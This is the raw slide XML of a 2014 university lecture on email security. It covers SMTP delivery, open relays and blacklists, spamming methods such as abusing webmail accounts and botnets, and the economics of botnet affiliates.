            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3696" y="1584"/>
              <a:ext cx="1824" cy="1488"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 432 w 1824"/>
                <a:gd name="T1" fmla="*/ 144 h 1488"/>
                <a:gd name="T2" fmla="*/ 144 w 1824"/>
                <a:gd name="T3" fmla="*/ 384 h 1488"/>
                <a:gd name="T4" fmla="*/ 0 w 1824"/>
                <a:gd name="T5" fmla="*/ 960 h 1488"/>
                <a:gd name="T6" fmla="*/ 96 w 1824"/>
                <a:gd name="T7" fmla="*/ 1392 h 1488"/>
                <a:gd name="T8" fmla="*/ 624 w 1824"/>
                <a:gd name="T9" fmla="*/ 1296 h 1488"/>
                <a:gd name="T10" fmla="*/ 1296 w 1824"/>
                <a:gd name="T11" fmla="*/ 1488 h 1488"/>
                <a:gd name="T12" fmla="*/ 1680 w 1824"/>
                <a:gd name="T13" fmla="*/ 1248 h 1488"/>
                <a:gd name="T14" fmla="*/ 1824 w 1824"/>
                <a:gd name="T15" fmla="*/ 480 h 1488"/>
                <a:gd name="T16" fmla="*/ 1344 w 1824"/>
                <a:gd name="T17" fmla="*/ 384 h 1488"/>
                <a:gd name="T18" fmla="*/ 1344 w 1824"/>
                <a:gd name="T19" fmla="*/ 0 h 1488"/>
                <a:gd name="T20" fmla="*/ 1056 w 1824"/>
                <a:gd name="T21" fmla="*/ 192 h 1488"/>
                <a:gd name="T22" fmla="*/ 432 w 1824"/>
                <a:gd name="T23" fmla="*/ 144 h 1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24" h="1488">
                  <a:moveTo>
                    <a:pt x="432" y="144"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="1392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624" y="1296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296" y="1488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1680" y="1248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1824" y="480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432" y="144"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4416" y="1488"/>
              <a:ext cx="480"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a:t>LAN</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2256" y="2112"/>
              <a:ext cx="1680" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="254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400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Line 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3024" y="2544"/>
              <a:ext cx="912" cy="1008"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">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sz="1400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="651967">
              <a:off x="2448" y="2004"/>
              <a:ext cx="1248"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a:t>send email</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="18712672">
              <a:off x="2645" y="2728"/>
              <a:ext cx="1680"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a:t>forward email</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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Announcements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There is no class on 3 Feb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First challenge announced on 4 Feb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C270C27E-8536-9149-9DA9-3AFF6BC96CEE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144599364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Limitation: servers do not operate as open relays</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For a message to be accepted by the mail server, either the sender’s or the recipient’s address has to belong to the same domain as the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>systems belonging to the same domain as the mail server can send messages, with the sender being a part of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An open relay used for SPAM will be detected and included into a blacklist, to be avoided by other servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421206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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spamming Techniques (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Method 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: abuse a webmail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a script to open many webmail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>accounts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>spam until </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>accounts are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>closed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Method 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: hack into home </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>computers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a virus that infects home computers (turning them </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>into “bots”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a network of bots to send out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>spam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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it works</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1295400"/>
            <a:ext cx="6572020" cy="5073599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="6324600"/>
            <a:ext cx="1587920" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: Wikipedia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239000" y="3657600"/>
            <a:ext cx="1676400" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="342000" indent="-342000" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="496800" lvl="1" indent="-270000" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685800" indent="-228600" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-228600" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1143000" indent="-228600" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1377950" indent="-228600" defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1603375" indent="-228600" defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="1800" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1830388" indent="-228600" defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="1800" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2057400" indent="-228600" defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="1800" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The typical affiliate earns about $100 per 1,000 infected hosts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22201150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Botnets (illegal)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
